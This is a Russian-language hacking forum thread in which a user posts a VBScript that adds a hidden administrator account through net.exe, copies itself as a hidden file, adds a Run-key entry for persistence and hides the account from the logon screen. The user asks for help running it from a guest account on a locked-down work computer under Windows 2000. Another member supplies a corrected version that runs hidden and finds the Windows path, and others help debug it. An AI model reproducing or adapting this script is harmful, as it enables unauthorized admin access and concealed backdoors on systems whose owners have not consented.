К Уважаемым хакерам просьба
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
К Уважаемым хакерам просьба - 2009-01-29 14:02:46.060000
|
|
|
A67809R
Сообщений: 60
Оценки: 0
Присоединился: 2008-10-25 01:08:21.540000
|
Есть скрипт оч хороший - не мой (Заранее прошу автора не гневаться), который оч. полезен мне был бы, да не задача малая он тока по wind XP - отлично подходит - пробовал. А мне бы его как то поменять под 2000-й Windows. А то пробовал на последней ОС - одни ошибки. Прошу уважаемых хакеров посмотрите че можна сделать.
Вот есть 'он':
Открываем блокнот или любой другой текстовый редактор,
В нем пишем такой код:
Set s=CreateObject("WScript.Shell")
s.run"C:\windows\system32\net.exe user zimper qwerty /add", True
s.run"C:\windows\system32\net.exe localgroup Администраторы zimper /add", True
и сохраняем ето под расширением vbs.
И так сейчас я обьясню смысел етого кода. Кому не интерестно,может не читать!
В первой строке мы обьявляем переменную s на COM файлы, ето дает нам возможность запускать программы и редактировать реестр. Во второй строке, командой run запускаем приложение net.exe(Net Command),которое отвечает за создание учетки.Добавляем юзера zimper с пассом qwerty.Во второй строке,мы даем юзеру права админа.Все,осталось запустить!
Но…Так как мы гость,то мы не имеем права создавать учетку,но ето не беда.Открываем наш,только что нарисаный файлик ,и дописуем там такое:
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.GetFile(WScript.ScriptFullName)
file.Copy("C:/fuck_admin.vbs")
Set file2=fso.GetFile("C:/fuck_admin.vbs")
file2.Attributes=+2
s.RegWrite"HKEY_LOCAL_MACHINE\Sowtware\Microsoft\W indows\CurrentWersion\Run\fuck_admin","C:/fuck_adm in.vbs"
В етом коде,мы скопировали наш файлик на диск C.Свойстов Attributes=+2 мы зделали наш файлик
не видимым.И записали его в ветку реестра HKEY_LOCAL_MACHINE,а ето значит,что он будет запускаться на всех
учетках.Ну и конечно же, что бы админ не просек наши планы,мы спрячем нашу учетку,при помощи того же реестра.
s.RegWrite"HKEY_LOCAL_MACHINE\Software\MIcrosoft\W indows NT\CurrentVersion\Winlogon\
SpecialAccounts\UserList\zimper<=(имя нашей учетки)",0,"REG_DWORD"
В итоге наш код:
Сохраняем под расширением vbs
Set s=CreateObject("WScript.Shell")
s.run"C:\windows\system32\net.exe user zimper qwerty /add", True
s.run"C:\windows\system32\net.exe localgroup Администраторы zimper /add", True
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.GetFile(WScript.ScriptFullName)
file.Copy("C:/fuck_admin.vbs")
Set file2=fso.GetFile("C:/fuck_admin.vbs")
file2.Attributes=+2
s.RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W indows\CurrentVersion\Run\fuck_admin","C:/fuck_adm in.vbs"
s.RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\W indows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t\zimper",0,"REG_DWORD"
Заранее СПС!!!
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 14:14:31.510000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Ну элементарно может быть отключен vbs или переназначено расширение (т.е. все файлы vbs окрывать только блокнотом) или тут почитай:
http://forum.exler.ru/arc/index.php?s=0&showtopic=136923
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 14:38:30.740000
|
|
|
A67809R
Сообщений: 60
Оценки: 0
Присоединился: 2008-10-25 01:08:21.540000
|
Что характерно. Расширение когда меняю - то видно, что и меняется значок файла (или я просто чего то не знаю…[sm=ac.gif]) на такой, как - скритп. А ошибку выдает примерно такую, может это о чем то скажет Вам тоже? Вот :
"ActiveX component can't create object:'sсriрting.FileSystemObject' "
——
И ту ссылочки я прочитал содержимое Но к большому своему сожалению я ничего не могу поменять в настройках в ручную т.к. везде стоят ограничения доступа ко всем настройкам изменения системных параметров.[sm=17.gif]
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 14:44:39.093333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Может быть просто синтаксическая ошибка. Если код был скопирован откуда-то (например отсюда), то на многих форумах просто включен фильтр на такие слова, как sсriрt, например, просто заменяются некоторые буквы на аналогичные русские. Попробуйте перенабрать весь код вручную, тем более там переборка вся на 2 минуты
quote:
Что характерно. Расширение когда меняю
речь идет не о смене расширения, а о смене программы, отвечающей за запуск файлов .vbs
Т.е. если тыкнуть правой кнопкой мышки на файл .vbs ->Открыть с помощью->Выбрать программу
И там сменить установленный по дефолту "Microsoft (r) Windows Based sсriрt Host" (что правильно и как должно быть) на, например, "Блокнот" - то все файлы .vbs будут открываться блокнотом просто, т.е. не выполняться. Решается путем правки определенной ветки реестра
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 14:54:30.670000
|
|
|
A67809R
Сообщений: 60
Оценки: 0
Присоединился: 2008-10-25 01:08:21.540000
|
Да пробовал на своем Wind XP работает без отлично без ошибок. А на том не хочет, и при том, что там мне пришлось вручную все набирать, а то все входы и выходы перекрыты . Я там даже весь скрипт не писал, а оставлял тока первых три строки. Думал поможет:
Set s=CreateObject("WScript.Shell")
s.run"C:\windows\system32\net.exe user zimper qwerty /add", True
s.run"C:\windows\system32\net.exe localgroup Администраторы zimper /add", True
Но система все равно давала какую то другую ошибку, типа: вторая строка 4-й символ.
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 15:02:12.936666
|
|
|
A67809R
Сообщений: 60
Оценки: 0
Присоединился: 2008-10-25 01:08:21.540000
|
А я понял. Спасибо. Может оно так и будет. Я уже буду на работе в суботу и попробую, а после -вечером напишу о результате. Спасибо большое за то, что послушали и посоветовали. Если будете иметь возможность - зайдите вечером в эту тему.
—————
Только скажи пожалуйста где найти и сменить установленный по дефолту "Microsoft (r) Windows Based sсriрt Host". Я просто не нахожу???
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 15:08:02.116666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
1. Просто "на том компутере" может вообще не быть папки Windows (установлена в другую диру, например)
2. /add", True - тут сначала 0 или 1 (видно не видно) по идее, а потом уже true/false - дождаться пока выполнит или не дожидаться
Попробуй так:
Set WSHshell = WScript.CreateObject("WScript.Shell")
Set sDir = WSHshell.Environment("Process") ' - находим путь к папке Windows
WSHshell.Run sDir("windir") & "\system32\net.exe user zimper qwerty /add", 0, TRUE
WSHshell.Run sDir("windir") & "\system32\net.exe localgroup Администраторы zimper /add", 0, TRUE
Слово script везде в коде руками набери (фильтр)
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 15:17:16.340000
|
|
|
A67809R
Сообщений: 60
Оценки: 0
Присоединился: 2008-10-25 01:08:21.540000
|
А я нашел ту папку где Windows находиться. Это папка WINNT. Я в скрипте менял названия с Windows на Winnt. Но факт, что ошибка была все равно. Так мне этот скрипт написать, который выше Ты мне написал, все равно? или можна:
Set s=CreateObject("Wsсriрt.Shell")
s.run"C:\winnt\system32\net.exe user zimper qwerty /add", 0, TRUE
s.run"C:\winnt\system32\net.exe localgroup Администраторы zimper /add", 0, TRUE
Или наверное я лучше сделаю как ты написал, а то я в этом все равно нераздупляюсь вообще
На счет вручную прописать слово sсriрt я попробую - не пробовал.
|
|
|
|
|
К Уважаемым хакерам просьба - 2009-01-29 17:28:48.300000
|
|
|
Skayder
Сообщений: 82
Оценки: 0
Присоединился: 2008-12-19 12:58:40.493333
|
2000 не может создать sсriрting.filesystemobject
ActiveX component can't create object:'sсriрting.FileSystemObject
Если пеервести с буржуйского то:
ActiveX не может создовать обьект sсriрting. FileSystemObject
Так-чт, обломинго..Ищи в нете что заменяет в 2000 filesystem
|
|
|
|
|
RE: К Уважаемым хакерам просьба - 2009-01-29 17:34:32.053333
|
|
|
A67809R
Сообщений: 60
Оценки: 0
Присоединился: 2008-10-25 01:08:21.540000
|
Ну спасисбо, а что искать именно то? Хотя бы наведи на правельный путь
Я то перевел текст, но — когда убирал строчку ту… - оно бросало другие ошибки
к сожалению не помню но помню только, что типа: вторая строка 4-й символ.
|
|
|
|
|
|
